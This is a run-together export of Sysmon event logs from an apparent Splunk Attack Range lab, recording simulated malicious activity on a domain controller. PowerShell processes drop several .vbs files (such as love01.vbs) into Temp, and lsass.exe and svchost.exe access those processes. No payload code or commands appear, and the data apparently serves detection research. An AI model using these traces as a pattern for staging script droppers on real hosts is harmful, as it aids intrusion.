Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCFD48521977C153596A11F9102FE110,SHA256=2FFB9F85235F48710017653B514A61C4EBF424E3B72161D1DAE16681CB170ACC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106839Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:49.841{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67C7FDF70BCD234F29D4A0472428CB39,SHA256=4B07706C752958D1387C9206FE0B9DF42A11332A57E9EA5735FEEC37AEF508FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083252Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:49.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07783CC6F362FC259E4E062E12E165FB,SHA256=0F9C16659796EC3D5D4FF99855929DDBA6E35153B5B4FBAAE57D9612057FD508,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106838Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:49.310{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\_______ _____ ___ ______ ______.vbs@2021-10-04_080015MD5=48CAF5E47D5DC7E8F6ED7E942BBB2A3F,SHA256=7A3A482511A305BEBDFD9208EEED517E4DDAF25C86DA9025C3659FC9DF7F199D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000106837Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:49.310{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exeC:\Temp\_______ _____ ___ ______ ______.vbs2021-10-04 07:34:26.000 23542300x8000000000000000106836Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:49.310{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\_______ _____ ___ ______ ______.vbsMD5=BBC2230817ED231DD2FE77849DEA54FB,SHA256=1BA98ACA3C82A11DADD3F685BBC7517710581BAA588556989CCF827399762F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106840Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:50.893{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3566800613C953A470DED93760A2088F,SHA256=E9295BF518BEF2DB2E41C6691127AC13DBE3C5FD4485B4061E4C58E2DF674703,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083255Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:50.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E7AB85B5F6CE0846C4177262A4E9198,SHA256=EB7E5A5ADB618CBBABB1AC19E1CCFF207C45FDA318205E94A48D73AC1CCE719B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083254Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:50.167{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3BC7CD811C62897EBC048D2C31A1E5D1,SHA256=A1008DDFD0078BD5AAA4A5B5124F8810F90874EAE417C26E8AF67040A1820590,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083253Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:50.167{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=41AA92F3968AC2E5456BC7BA773719E9,SHA256=E4791630471AC6D25D8E43E9FF10B93E3775D1E21B28B7D419E2C079C5E136F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083256Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:51.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47ECD9F82F3BAB579EEA6CBB9CB7E446,SHA256=0A3672328BA97DE60312C08D3973CF598D4BA805A0E9F54DE70CBC3F845F2161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106841Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:51.924{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CA7587E3E90FF876F4E6F14EEC0621B,SHA256=7F2A0DACB80BD2C83E5C74DA4A9B31A530DB87DC93F3A576C3A4B0E0FA99BF35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107023Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.978{58E9C193-B4B4-615A-3B02-00000000FC01}5176ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107022Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.942{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C80C880C6F0729C4A891ED17900D1A71,SHA256=880818DDBF85C98C955BDB2D374371DF0913B8707AFD3C6A91C1A1B27B5A1F13,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107021Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:51.433{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51864-false10.0.1.12-8000- 23542300x800000000000000083257Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:52.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B20D2C1E57034D5222A4225F8C80E2C,SHA256=D0DA6DF4C5BFFFF4068841C2761821503C938AB58F5C2E13D67B75FC5E8E175D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000107020Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.693{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs2021-10-04 08:00:52.693 11241100x8000000000000000107019Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.624{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\love01.vbs2021-10-04 08:00:52.624 11241100x8000000000000000107018Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.609{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\nono.vbs2021-10-04 08:00:52.609 11241100x8000000000000000107017Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.593{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\lovefhdfhdf.vbs2021-10-04 08:00:52.593 23542300x8000000000000000107016Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.574{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3F2A2B87F38857F1A4698D280482159,SHA256=6EC34BEB9F809E8BD29947B46E783AA3224695C1F3D2AC26FD0ECFDD5482381E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107015Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.540{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107014Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.540{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107013Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.508{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107012Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.508{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107011Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.477{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107010Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.477{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107009Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.477{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107008Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.477{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107007Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.455{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107006Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.455{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107005Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.455{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107004Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.455{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000107003Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:00:52.455{58E9C193-B4B4-615A-4602-00000000FC01}7216\PSHost.132778080521845387.7216.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000107002Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.424{58E9C193-B4B4-615A-4602-00000000FC01}7216ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hvf5ctzm.rr5.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000107001Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:00:52.424{58E9C193-B4B4-615A-4402-00000000FC01}5708\PSHost.132778080521674568.5708.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x8000000000000000107000Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.424{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106999Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.424{58E9C193-B4B4-615A-4602-00000000FC01}7216ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_erba05ob.lt5.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106998Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.424{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106997Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.408{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_erba05ob.lt5.ps12021-10-04 08:00:52.408 23542300x8000000000000000106996Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.392{58E9C193-B4B4-615A-4402-00000000FC01}5708ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1mf2sa2f.ert.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106995Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.392{58E9C193-B4B4-615A-4402-00000000FC01}5708ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_q5ijvekw.ruz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106994Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.392{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106993Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 